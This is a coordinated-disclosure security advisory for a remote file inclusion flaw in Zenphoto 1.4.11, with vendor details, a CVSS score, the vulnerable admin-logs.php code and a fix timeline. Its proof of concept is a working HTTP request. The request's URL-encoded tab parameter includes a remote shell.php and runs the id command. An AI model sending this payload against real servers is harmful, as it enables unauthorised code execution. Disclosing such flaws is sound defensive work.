Zenphoto 1.4.11: RFI
Date: 2016-03-15 14:02:421. Introduction
| Affected Product: | Zenphoto 1.4.11 |
| Fixed in: | 1.4.12 |
| Fixed Version Link: | https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip |
| Vendor Website: | http://www.zenphoto.org/ |
| Vulnerability Type: | RFI |
| Remote Exploitable: | Yes |
| Reported to vendor: | 01/29/2016 |
| Disclosed to public: | 03/15/2016 |
| Release mode: | Coordinated Release |
| CVE: | n/a |
| Credits | Tim Coen of Curesec GmbH |
2. Overview
Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is vulnerable to remote file inclusion. An admin account is required.
3. Details
Description
CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C
When downloading a log file, the input is not properly sanitized, leading to RFI.
An admin account is required, and allow_url_fopen must be set to true - which is the default setting.
In old versions of PHP, this would additionally lead to LFI via null byte poisoning or path expansion, regardless of allow_url_fopen settings.
Proof of Concept
GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page=logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename=security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1
Code
// admin-logs.php (sanitize(x, 3) only strips out tags) case 'download_log': $zipname = sanitize($_GET['tab'], 3) . '.zip'; if (class_exists('ZipArchive')) { $zip = new ZipArchive; $zip->open($zipname, ZipArchive::CREATE); $zip->addFile($file, basename($file)); $zip->close(); ob_get_clean(); header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Cache-Control: private", false); header("Content-Type: application/zip"); header("Content-Disposition: attachment; filename=" . basename($zipname) . ";" ); header("Content-Transfer-Encoding: binary"); header("Content-Length: " . filesize($zipname)); readfile($zipname); // remove zip file from temp path unlink($zipname); exit; } else { include_once(SERVERPATH . '/' . ZENFOLDER . '/lib-zipStream.php'); $zip = new ZipStream($zipname); $zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file)); $zip->finish(); } break;
4. Solution
To mitigate this issue please upgrade at least to version 1.4.12:
https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip
Please note that a newer version might already be available.
5. Report Timeline
| 01/29/2016 | Informed Vendor about Issue |
| 01/29/2016 | Vendor replies |
| 02/23/2016 | Vendor sends fix for verification |
| 02/23/2016 | Suggested improvements for attempted fix |
| 02/29/2016 | Delayed Disclosure |
| 03/14/2016 | Vendor releases fix |
| 03/15/2016 | Disclosed to public |